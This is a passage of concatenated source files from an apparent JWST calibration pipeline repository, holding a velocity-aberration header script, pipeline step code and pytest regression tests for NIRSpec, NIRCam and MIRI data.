LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\n'''\nThis script adds velocity aberration correction information to the FITS\nfiles provided to it on the command line (one or more).\n\nIt assumes the following keywords are present in the file header:\n\nJWST_DX (km/sec)\nJWST_DY (km/sec)\nJWST_DZ (km/sec)\nRA_REF (deg)\nDEC_REF (deg)\n\nThe keywords added are:\n\nVA_SCALE (dimensionless scale factor)\n\nIt does not currently place the new keywords in any particular location\nin the header other than what is required by the standard.\n'''\n\nimport astropy.io.fits as fits\nimport logging\nimport math\nimport sys\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\nSPEED_OF_LIGHT = 299792.458 # km / s\nd_to_r = math.pi / 180.\n\n\ndef aberration_scale(velocity_x, velocity_y, velocity_z,\n targ_ra, targ_dec):\n \"\"\"Compute the scale factor due to velocity aberration.\n\n Parameters\n ----------\n velocity_x, velocity_y, velocity_z: float\n The components of the velocity of JWST, in km / s with respect to\n the Sun. These are celestial coordinates, with x toward the\n vernal equinox, y toward right ascension 90 degrees and declination\n 0, z toward the north celestial pole.\n\n targ_ra, targ_dec: float\n The right ascension and declination of the target (or some other\n point, such as the center of a detector). The equator and equinox\n should be the same as the coordinate system for the velocity.\n\n Returns\n -------\n scale_factor: float\n Multiply the nominal image scale (e.g. in degrees per pixel) by\n this value to obtain the image scale corrected for the \"aberration\n of starlight\" due to the velocity of JWST with respect to the Sun.\n \"\"\"\n\n speed = math.sqrt(velocity_x**2 + velocity_y**2 + velocity_z**2)\n if speed == 0.0:\n logger.warning('Speed is zero. Forcing scale to 1.0')\n return 1.0\n\n beta = speed / SPEED_OF_LIGHT\n gamma = 1. / math.sqrt(1. - beta**2)\n\n # [targ_x, targ_y, targ_z] is a unit vector.\n r_xy = math.cos(targ_dec * d_to_r) # radial distance in xy-plane\n targ_x = r_xy * math.cos(targ_ra * d_to_r)\n targ_y = r_xy * math.sin(targ_ra * d_to_r)\n targ_z = math.sin(targ_dec * d_to_r)\n\n dot_prod = (velocity_x * targ_x +\n velocity_y * targ_y +\n velocity_z * targ_z)\n cos_theta = dot_prod / speed\n # This sin_theta is only valid over the range [0, pi], but so is the\n # angle between the velocity vector and the direction toward the target.\n sin_theta = math.sqrt(1. - cos_theta**2)\n\n tan_theta_p = sin_theta / (gamma * (cos_theta + beta))\n theta_p = math.atan(tan_theta_p)\n\n scale_factor = (gamma * (cos_theta + beta)**2 /\n (math.cos(theta_p)**2 * (1. + beta * cos_theta)))\n\n return scale_factor\n\n\ndef aberration_offset(velocity_x, velocity_y, velocity_z,\n targ_ra, targ_dec):\n \"\"\"Compute the RA/Dec offsets due to velocity aberration.\n\n Parameters\n ----------\n velocity_x, velocity_y, velocity_z: float\n The components of the velocity of JWST, in km / s with respect to\n the Sun. These are celestial coordinates, with x toward the\n vernal equinox, y toward right ascension 90 degrees and declination\n 0, z toward the north celestial pole.\n\n targ_ra, targ_dec: float\n The right ascension and declination of the target (or some other\n point, such as the center of a detector). The equator and equinox\n should be the same as the coordinate system for the velocity.\n\n Returns\n -------\n delta_ra, delta_dec: float\n The offset to be added to the input RA/Dec, in units of radians.\n \"\"\"\n\n xdot = velocity_x / SPEED_OF_LIGHT\n ydot = velocity_y / SPEED_OF_LIGHT\n zdot = velocity_z / SPEED_OF_LIGHT\n\n sin_alpha = math.sin(targ_ra * d_to_r)\n cos_alpha = math.cos(targ_ra * d_to_r)\n sin_delta = math.sin(targ_dec * d_to_r)\n cos_delta = math.cos(targ_dec * d_to_r)\n\n delta_ra = (-xdot * sin_alpha + ydot * cos_alpha) / cos_delta\n delta_dec = (-xdot * cos_alpha * sin_delta -\n ydot * sin_alpha * sin_delta +\n zdot * cos_delta)\n\n return delta_ra, delta_dec\n\n\ndef add_dva(filename):\n '''\n Given the name of a valid partially populated level 1b JWST file,\n determine the velocity aberration scale factor.\n\n It presumes all the accessed keywords are present (see first block).\n '''\n hdulist = fits.open(filename, 'update')\n pheader = hdulist[0].header\n sheader = hdulist['SCI'].header\n jwst_dx = float(pheader['JWST_DX'])\n jwst_dy = float(pheader['JWST_DY'])\n jwst_dz = float(pheader['JWST_DZ'])\n ra_ref = float(sheader['RA_REF'])\n dec_ref = float(sheader['DEC_REF'])\n\n # compute the velocity aberration information\n scale_factor = aberration_scale(jwst_dx, jwst_dy, jwst_dz,\n ra_ref, dec_ref)\n ra_off, dec_off = aberration_offset(jwst_dx, jwst_dy, jwst_dz,\n ra_ref, dec_ref)\n\n # update header\n pheader['DVA_RA'] = ra_off\n pheader['DVA_DEC'] = dec_off\n sheader['VA_SCALE'] = scale_factor\n hdulist.flush()\n hdulist.close()\n\nif __name__ == '__main__':\n if len(sys.argv) <= 1:\n raise ValueError('missing filename argument(s)')\n for filename in sys.argv[1:]:\n add_dva(filename)\n" }, { "alpha_fraction": 0.5910129547119141, "alphanum_fraction": 0.6313785314559937, "avg_line_length": 27.54347801208496, "blob_id": "bc113dde6170e3a08063c9eab76aea2dfbee7e1f", "content_id": "d9f53885f9bbc5dcd71ce5f94711bbc8571f9089", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1313, "license_type": "permissive", "max_line_length": 72, "num_lines": 46, "path": "/jwst/tests_nightly/general/nirspec/test_spec2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test aspects of Spec2Pipline\"\"\"\nimport subprocess\n\nimport pytest\nfrom ci_watson.artifactory_helpers import get_bigdata\n\nfrom jwst.assign_wcs.util import NoDataOnDetectorError\nfrom jwst.pipeline import Spec2Pipeline\n\n\[email protected]\ndef test_nrs2_nodata_api(envopt, _jail):\n \"\"\"\n Regression test of handling NRS2 detector that has no data.\\\n \"\"\"\n\n # Only need to ensure that assing_wcs is run.\n # This still will fail and should cause the pipeline to halt.\n step = Spec2Pipeline()\n step.assign_wcs.skip = False\n\n with pytest.raises(NoDataOnDetectorError):\n step.run(get_bigdata('jwst-pipeline', envopt,\n 'nirspec', 'test_assignwcs',\n 'jw84700006001_02101_00001_nrs2_rate.fits'\n ))\n\n\[email protected]\ndef test_nrs2_nodata_strun(envopt, _jail):\n \"\"\"Ensure that the appropriate exit status is returned from strun\"\"\"\n\n data_file = get_bigdata('jwst-pipeline', envopt,\n 'nirspec', 'test_assignwcs',\n 'jw84700006001_02101_00001_nrs2_rate.fits'\n )\n\n cmd = [\n 'strun',\n 'jwst.pipeline.Spec2Pipeline',\n data_file,\n '--steps.assign_wcs.skip=false'\n ]\n status = subprocess.run(cmd)\n\n assert status.returncode == 64\n" }, { "alpha_fraction": 0.6880252361297607, "alphanum_fraction": 0.6901260614395142, "avg_line_length": 22.799999237060547, "blob_id": "132e949ef34436eed83bcaf6352c0cff154adc0e", "content_id": "e9d9882e7932e7bf6a61188bbc9bfb6d82020a0d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 952, "license_type": "permissive", "max_line_length": 98, "num_lines": 40, "path": "/jwst/datamodels/tests/test_filetype.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom ..filetype import check\n\nSUPPORTED_EXTS = (('fits', 'fits'), ('json', 'asn'), ('asdf', 'asdf')) # (ext, expected filetype)\n\n\[email protected](params=SUPPORTED_EXTS)\ndef input_file(request):\n return f'test_file.{request.param[0]}', request.param[-1]\n\n\[email protected](params=['stpipe.MyPipeline.fits', 'stpipe.MyPipeline.fits.gz'])\ndef pipeline_file(request):\n return request.param\n\n\ndef test_check_on_str_init(input_file):\n filename, expected = input_file\n filetype = check(filename)\n\n assert filetype == expected\n\n\ndef test_check_fails_on_unsupported_ext():\n with pytest.raises(ValueError):\n check('test_file')\n\n\ndef test_check_works_for_zipped(input_file):\n filename, expected = input_file\n filename += '.gz' # extra zip extension\n\n filetype = check(filename)\n\n assert filetype == expected\n\n\ndef test_check_works_for_pipeline_patters(pipeline_file):\n assert check(pipeline_file) == 'fits'\n" }, { "alpha_fraction": 0.5657083988189697, "alphanum_fraction": 0.5770020484924316, "avg_line_length": 29.4375, "blob_id": "7a766ec00bc4b9882bd8cc77639094a622df57cd", "content_id": "c226e4c4b05c5629392271938650e41f0430207c", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2922, "license_type": "permissive", "max_line_length": 73, "num_lines": 96, "path": "/jwst/datamodels/tests/test_history.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import datetime\n\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.time import Time\n\nfrom asdf.tags.core import HistoryEntry\n\nfrom .. import DataModel\n\n\ndef test_historylist_methods():\n m = DataModel()\n h1 = m.history\n\n info = \"First entry\"\n h1.append(info)\n assert h1 == info, \"Append new history entry\"\n\n h2 = m.history\n assert h2 == info, \"Two history lists point to the same object\"\n\n assert len(h1) == 1, \"Length of a history list\"\n\n entry = h1[0]\n assert entry[\"description\"] == info, \"Get history list item\"\n\n info += \" for real\"\n h1[0] = info\n assert h1 == info, \"Set history list item\"\n\n del h1[0]\n assert len(h1) == 0, \"Delete history list item\"\n\n info = (\"First entry\", \"Second_entry\", \"Third entry\")\n h1.extend(info)\n assert len(h1) == 3, \"Length of extended history list\"\n assert h1 == info, \"Contents of extended history list\"\n\n for entry, item in zip(h1, info):\n assert entry[\"description\"] == item, \"Iterate over history list\"\n\n h1.clear()\n assert len(h1) == 0, \"Clear history list\"\n\ndef test_history_from_model_to_fits(tmpdir):\n tmpfits = str(tmpdir.join('tmp.fits'))\n m = DataModel()\n m.history = [HistoryEntry({\n 'description': 'First entry',\n 'time': Time(datetime.datetime.now())})]\n m.history.append(HistoryEntry({\n 'description': 'Second entry',\n 'time': Time(datetime.datetime.now())\n }))\n m.save(tmpfits)\n\n with fits.open(tmpfits, memmap=False) as hdulist:\n assert list(hdulist[0].header['HISTORY']) == [\"First entry\",\n \"Second entry\"]\n\n with DataModel(tmpfits) as m2:\n m2 = DataModel()\n m2.update(m)\n m2.history = m.history\n\n assert m2.history == [{'description': \"First entry\"},\n {'description': \"Second entry\"}]\n\n m2.save(tmpfits)\n\n with fits.open(tmpfits, memmap=False) as hdulist:\n assert list(hdulist[0].header['HISTORY']) == [\"First entry\",\n \"Second entry\"]\n\n\ndef test_history_from_fits(tmpdir):\n tmpfits = str(tmpdir.join('tmp.fits'))\n header = fits.Header()\n header['HISTORY'] = \"First entry\"\n header['HISTORY'] = \"Second entry\"\n fits.writeto(tmpfits, np.array([]), header, overwrite=True)\n\n with DataModel(tmpfits) as m:\n assert m.history == [{'description': 'First entry'},\n {'description': 'Second entry'}]\n\n del m.history[0]\n m.history.append(HistoryEntry({'description': \"Third entry\"}))\n assert m.history == [{'description': \"Second entry\"},\n {'description': \"Third entry\"}]\n m.save(tmpfits)\n\n with DataModel(tmpfits) as m:\n assert m.history == [{'description': \"Second entry\"},\n {'description': \"Third entry\"}]\n" }, { "alpha_fraction": 0.5180887579917908, "alphanum_fraction": 0.5805460810661316, "avg_line_length": 33.47058868408203, "blob_id": "624eb7e9059f3e6f7b43c5bc15387ae3b625b331", "content_id": "2d8dc8ee96fd975ede9fbb53e85387cdd74f6994", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2930, "license_type": "permissive", "max_line_length": 84, "num_lines": 85, "path": "/jwst/tests_nightly/general/nircam/test_nrc_image3_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n\[email protected]\nclass TestImage3Pipeline1(BaseJWSTTest):\n \"\"\"Regression test definitions for CALIMAGE3 pipeline.\n\n Regression test of calwebb_image3 pipeline on NIRCam\n simulated long-wave data.\n \"\"\"\n input_loc = 'nircam'\n ref_loc = ['test_calimage3', 'truth']\n test_dir = 'test_calimage3'\n\n def test_image3_pipeline1(self):\n\n asn_name = \"mosaic_long_asn.json\"\n asn_file = self.get_data('test_calimage3', asn_name)\n for file in raw_from_asn(asn_file):\n self.get_data('test_calimage3', file)\n\n collect_pipeline_cfgs('config')\n\n args = [\n 'config/calwebb_image3.cfg',\n asn_file,\n '--steps.tweakreg.skip=True',\n ]\n\n Step.from_cmdline(args)\n\n self.ignore_keywords += ['NAXIS1', 'TFORM*']\n self.ignore_fields = self.ignore_keywords\n self.rtol = 0.0001\n\n outputs = [('nrca5_47Tuc_subpix_dither1_newpos_a3001_crf.fits',\n 'nrca5_47Tuc_subpix_dither1_newpos_cal-a3001_ref.fits'),\n ('mosaic_long_i2d.fits',\n 'mosaic_long_i2d_ref.fits'),\n ('mosaic_long_cat.ecsv',\n 'mosaic_long_cat_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n\n def test_image3_pipeline2(self):\n \"\"\"Regression test definitions for CALIMAGE3 pipeline.\n\n Regression test of calwebb_image3 pipeline on NIRCam\n simulated long-wave data with a 6-point dither.\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n \"jw10002-o001_20171116t191235_image3_002_asn.json\")\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n collect_pipeline_cfgs('config')\n\n args = [\n 'config/calwebb_image3.cfg',\n asn_file,\n '--steps.tweakreg.kernel_fwhm=2',\n '--steps.tweakreg.snr_threshold=5',\n '--steps.tweakreg.enforce_user_order=True',\n '--steps.tweakreg.searchrad=10',\n '--steps.tweakreg.fitgeometry=rscale',\n ]\n\n Step.from_cmdline(args)\n\n self.ignore_keywords += ['NAXIS1', 'TFORM*']\n self.ignore_fields = self.ignore_keywords\n self.rtol = 0.0001\n\n outputs = [('jw10002001001_01101_00004_nrcblong_o001_crf.fits',\n 'jw10002001001_01101_00004_nrcblong_o001_crf_ref.fits'),\n ('jw10002-o001_t002_nircam_f444w_i2d.fits',\n 'jw10002-o001_t002_nircam_f444w_i2d_ref.fits'),\n ('jw10002-o001_t002_nircam_f444w_cat.ecsv',\n 'jw10002-o001_t002_nircam_f444w_cat_ref.ecsv'),\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 28.600000381469727, "blob_id": "ed9d50a2226f4e5509dd054ec422320f212203f4", "content_id": "48f9af6f75b99aa0fd3c3047c3d4a3f08341c810", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "permissive", "max_line_length": 48, "num_lines": 5, "path": "/jwst/stpipe/__init__.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .step import Step\nfrom .pipeline import Pipeline\nfrom .linear_pipeline import LinearPipeline\n\n__all__ = ['Step', 'Pipeline', 'LinearPipeline']\n" }, { "alpha_fraction": 0.6857815980911255, "alphanum_fraction": 0.7140612602233887, "avg_line_length": 44.46428680419922, "blob_id": "383b267ce2db4522f8e8f40581faec43357f5087", "content_id": "d30b0870ffd5070bd9558b200f8631daa8684ee7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1273, "license_type": "permissive", "max_line_length": 85, "num_lines": 28, "path": "/jwst/assign_wcs/tests/test_schemas.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from astropy.modeling import models\nfrom astropy import units as u\nfrom jwst.datamodels import DistortionModel\n\n\ndef test_distortion_schema(tmpdir):\n \"\"\"Make sure DistortionModel roundtrips\"\"\"\n m = models.Shift(1) & models.Shift(2)\n dist = DistortionModel(model=m, input_units=u.pixel, output_units=u.arcsec)\n\n dist.meta.instrument.name = \"NIRCAM\"\n dist.meta.instrument.detector = \"NRCA1\"\n dist.meta.instrument.p_pupil = \"F162M|F164N|CLEAR|\"\n dist.meta.instrument.pupil = \"F162M\"\n dist.meta.exposure.p_exptype = \"NRC_IMAGE|NRC_TSIMAGE|NRC_FLAT|NRC_LED|NRC_WFSC|\"\n dist.meta.exposure.type = \"NRC_IMAGE\"\n dist.meta.psubarray = \"FULL|SUB64P|SUB160)|SUB160P|SUB320|SUB400P|SUB640|\"\n dist.meta.subarray.name = \"FULL\"\n path = str(tmpdir.join(\"test_dist.asdf\"))\n dist.save(path)\n\n with DistortionModel(path) as dist1:\n assert dist1.meta.instrument.p_pupil == dist.meta.instrument.p_pupil\n assert dist1.meta.instrument.pupil == dist.meta.instrument.pupil\n assert dist1.meta.exposure.p_exptype == dist.meta.exposure.p_exptype\n assert dist1.meta.exposure.type == dist.meta.exposure.type\n assert dist1.meta.psubarray == dist.meta.psubarray\n assert dist1.meta.subarray.name == dist.meta.subarray.name\n" }, { "alpha_fraction": 0.6454464793205261, "alphanum_fraction": 0.6781609058380127, "avg_line_length": 29.567567825317383, "blob_id": "d68e768f006b179fab18b07e2658655f615f986a", "content_id": "cb2dee0d42488a297fe69a8fc78b4e7d9871bea2", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1131, "license_type": "permissive", "max_line_length": 105, "num_lines": 37, "path": "/jwst/lib/tests/test_s3_utils.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.lib import s3_utils\nfrom . import helpers\n\n\[email protected]\ndef s3_text_file(s3_root_dir):\n path = str(s3_root_dir.join(\"test.txt\"))\n with open(path, \"w\") as text_file:\n print(\"foo\", file=text_file)\n\n return path\n\n\ndef test_object_exists(s3_text_file):\n assert s3_utils.object_exists(\"s3://test-s3-data/test.txt\") is True\n assert s3_utils.object_exists(\"s3://test-s3-data/missing.fits\") is False\n assert s3_utils.object_exists(\"s3://missing-bucket/test.txt\") is False\n\n\ndef test_get_object(s3_text_file):\n assert s3_utils.get_object(\"s3://test-s3-data/test.txt\").read() == b\"foo\\n\"\n\n\ndef test_get_client(s3_text_file):\n assert isinstance(s3_utils.get_client(), helpers.MockS3Client)\n\n\ndef test_is_s3_uri(s3_text_file):\n assert s3_utils.is_s3_uri(\"s3://test-s3-data/test.fits\") is True\n assert s3_utils.is_s3_uri(\"some/filesystem/path\") is False\n\n\ndef test_split_uri(s3_text_file):\n assert s3_utils.split_uri(\"s3://test-s3-data/key\") == (\"test-s3-data\", \"key\")\n assert s3_utils.split_uri(\"s3://test-s3-data/some/longer/key\") == (\"test-s3-data\", \"some/longer/key\")\n" }, { "alpha_fraction": 0.5601123571395874, "alphanum_fraction": 0.5640449523925781, "avg_line_length": 28.66666603088379, "blob_id": "ec6d49d2c6c438e81c6cd5df4ff9aa143cf722a5", "content_id": "053063c916f3c4141ab07875b446b66e46da2a2d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1780, "license_type": "permissive", "max_line_length": 80, "num_lines": 60, "path": "/jwst/wfs_combine/wfs_combine_step.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport os.path as op\n\nfrom ..stpipe import Step\nfrom . import wfs_combine\n\n__all__ = [\"WfsCombineStep\"]\n\n\nclass WfsCombineStep(Step):\n\n \"\"\"\n This step combines pairs of dithered PSF images\n \"\"\"\n\n spec = \"\"\"\n do_refine = boolean(default=False)\n \"\"\"\n\n def process(self, input_table):\n\n # Load the input ASN table\n asn_table = self.load_as_level3_asn(input_table)\n num_sets = len(asn_table['products'])\n\n self.log.info('Using input table: %s', input_table)\n self.log.info('The number of pairs of input files: %g', num_sets)\n\n # Process each pair of input images listed in the association table\n for which_set in asn_table['products']:\n\n # Get the list of science members in this pair\n science_members = [\n member\n for member in which_set['members']\n if member['exptype'].lower() == 'science'\n ]\n infile_1 = science_members[0]['expname']\n infile_2 = science_members[1]['expname']\n outfile = which_set['name']\n\n # Create the step instance\n wfs = wfs_combine.DataSet(\n infile_1, infile_2, outfile, self.do_refine\n )\n\n # Do the processing\n output_model = wfs.do_all()\n\n # Update necessary meta info in the output\n output_model.meta.cal_step.wfs_combine = 'COMPLETE'\n output_model.meta.asn.pool_name = asn_table['asn_pool']\n output_model.meta.asn.table_name = op.basename(input_table)\n\n # Save the output file\n self.save_model(\n output_model, suffix='wfscmb', output_file=outfile, format=False\n )\n\n return None\n" }, { "alpha_fraction": 0.6483516693115234, "alphanum_fraction": 0.6675823926925659, "avg_line_length": 25, "blob_id": "74b535d99605443e4e340b9ecb1f1b14620f5954", "content_id": "3ca94848f885704760e323a4db1908e7c7a0af0c", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "permissive", "max_line_length": 80, "num_lines": 14, "path": "/jwst/datamodels/extract1dimage.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from .model_base import DataModel\n\n__all__ = ['Extract1dImageModel']\n\nclass Extract1dImageModel(DataModel):\n \"\"\"\n A data model for the extract_1d reference image array.\n\n Parameters\n __________\n data : numpy float32 array\n 1-D extraction regions array\n \"\"\"\n schema_url = \"http://stsci.edu/schemas/jwst_datamodel/extract1dimage.schema\"\n" }, { "alpha_fraction": 0.4483985900878906, "alphanum_fraction": 0.4804270565509796, "avg_line_length": 19.071428298950195, "blob_id": "6c7f166ee09613c5739fc35ea8a80c83f463d97a", "content_id": "a76a6f13bd37324ddce3d87d3d37c66e9f4e83eb", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 281, "license_type": "permissive", "max_line_length": 48, "num_lines": 14, "path": "/jwst/datamodels/tests/test_storage.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom .. import util\n\n\ndef test_gentle_asarray():\n x = np.array([('abc', 1.0)], dtype=[\n ('FOO', 'S3'),\n ('BAR', '>f8')])\n\n new_dtype = [('foo', '|S3'), ('bar', '<f8')]\n\n y = util.gentle_asarray(x, new_dtype)\n\n assert y['BAR'][0] == 1.0\n" }, { "alpha_fraction": 0.4202929735183716, "alphanum_fraction": 0.4947580099105835, "avg_line_length": 50.57777786254883, "blob_id": "d29d9d0edaa2463d72696e3e8fa8178983fcca0c", "content_id": "ff2de8bead5087ad7dad29a4ca5f0776b0029fb0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13926, "license_type": "permissive", "max_line_length": 93, "num_lines": 270, "path": "/jwst/tests_nightly/general/miri/test_miri_steps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTestSteps\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\nfrom jwst.refpix import RefPixStep\nfrom jwst.dark_current import DarkCurrentStep\nfrom jwst.dq_init import DQInitStep\nfrom jwst.extract_1d import Extract1dStep\nfrom jwst.flatfield import FlatFieldStep\nfrom jwst.fringe import FringeStep\nfrom jwst.jump import JumpStep\nfrom jwst.lastframe import LastFrameStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.photom import PhotomStep\nfrom jwst.rscd import RSCD_Step\nfrom jwst.saturation import SaturationStep\nfrom jwst.srctype import SourceTypeStep\nfrom jwst.straylight import StraylightStep\n\n# Parameterized regression tests for MIRI processing\n# All tests in this set run with 1 input file and\n# only generate 1 output for comparison.\n#\[email protected]\nclass TestMIRISteps(BaseJWSTTestSteps):\n input_loc = 'miri'\n\n params = {'test_steps':\n [\n # test_refpix_miri: refpix step performed on MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_saturation.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_bias_drift.fits',\n output_hdus=[],\n id='refpix_miri'\n ),\n # test_refpix_miri2: refpix step performed on MIRI data\n dict(input='jw00025001001_01107_00001_MIRIMAGE_saturation.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00025001001_01107_00001_MIRIMAGE_bias_drift.fits',\n output_hdus=[],\n id='refpix_miri2'\n ),\n # test_dark_current_miri: dark current step performed on MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_bias_drift.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_dark_current.fits',\n output_hdus=[],\n id='dark_current_miri'\n ),\n # test_dark_current_miri2: dark current step performed on MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_lastframe.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_dark.fits',\n output_hdus=[],\n id='dark_current_miri2'\n ),\n # test_dq_init_miri: dq_init step performed on uncalibrated MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_uncal.fits',\n test_dir='test_dq_init',\n step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_dq_init.fits',\n output_hdus=[],\n id='dq_init_miri'\n ),\n # test_dq_init_miri2: dq_init step performed on uncalibrated MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_uncal.fits',\n test_dir='test_dq_init',\n step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_dqinit.fits',\n output_hdus=[],\n id='dq_init_miri2'\n ),\n # test_extract1d_miri: extract_1d step performed on MIRI LRS fixed-slit data\n dict(input='jw00035001001_01101_00001_mirimage_photom.fits',\n test_dir='test_extract1d',\n step_class=Extract1dStep,\n step_pars=dict(suffix='x1d'),\n output_truth='jw00035001001_01101_00001_mirimage_x1d.fits',\n output_hdus=[],\n id='extract1d_miri'\n ),\n # test_extract1d_miri2: extract_1d step performed on MIRI LRS slitless data\n dict(input='jw80600012001_02101_00003_mirimage_photom.fits',\n test_dir='test_extract1d',\n step_class=Extract1dStep,\n step_pars=dict(suffix='x1d'),\n output_truth='jw80600012001_02101_00003_mirimage_x1d.fits',\n output_hdus=[],\n id='extract1d_miri2'\n ),\n # test_flat_field_miri: flat_field step performed on MIRI data.\n dict(input='jw00001001001_01101_00001_MIRIMAGE_assign_wcs.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_flat_field.fits',\n output_hdus=[],\n id='flat_field_miri'\n ),\n # test_flat_field_miri2: flat_field step performed on MIRI data.\n dict(input='jw80600012001_02101_00003_mirimage_assign_wcs.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_flat_field.fits',\n output_hdus=[],\n id='flat_field_miri2'\n ),\n # test_fringe_miri: fringe performed on MIRI data.\n dict(input='fringe1_input.fits',\n test_dir='test_fringe',\n step_class=FringeStep,\n step_pars=dict(),\n output_truth='baseline_fringe1.fits',\n output_hdus=['primary','sci','err','dq'],\n id='fringe_miri'\n ),\n # test_fringe_miri2: fringe performed on MIRI data.\n dict(input='fringe2_input.fits',\n test_dir='test_fringe',\n step_class=FringeStep,\n step_pars=dict(),\n output_truth='baseline_fringe2.fits',\n output_hdus=['primary','sci','err','dq'],\n id='fringe_miri2'\n ),\n # test_fringe_miri3: fringe performed on MIRI data.\n dict(input='fringe3_input.fits',\n test_dir='test_fringe',\n step_class=FringeStep,\n step_pars=dict(),\n output_truth='baseline_fringe3.fits',\n output_hdus=['primary','sci','err','dq'],\n id='fringe_miri3'\n ),\n # test_jump_miri: jump step performed on MIRI data.\n dict(input='jw00001001001_01101_00001_MIRIMAGE_linearity.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=200.0),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_jump.fits',\n output_hdus=[],\n id='jump_miri'\n ),\n # test_jump_miri2: jump step performed on MIRI data.\n dict(input='jw80600012001_02101_00003_mirimage_dark.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=25.0),\n output_truth='jw80600012001_02101_00003_mirimage_jump.fits',\n output_hdus=[],\n id='jump_miri2'\n ),\n # test_lastframe_miri2: lastframe step performed on MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_rscd.fits',\n test_dir='test_lastframe',\n step_class=LastFrameStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_lastframe.fits',\n output_hdus=[],\n id='lastframe_miri2'\n ),\n # test_linearity_miri: linearity step performed on MIRI data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_dark_current.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw00001001001_01101_00001_MIRIMAGE_linearity.fits',\n output_hdus=[],\n id='linearity_miri'\n ),\n # test_linearity_miri2: linearity step performed on MIRI data\n dict(input='jw80600012001_02101_00003_mirimage_saturation.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw80600012001_02101_00003_mirimage_linearity.fits',\n output_hdus=[],\n id='linearity_miri2'\n ),\n # test_photom_miri: photom step performed on MIRI imaging data\n dict(input='jw00001001001_01101_00001_MIRIMAGE_emission.fits',\n test_dir='test_photom',\n step_class=PhotomStep,\n step_pars=dict(),\n 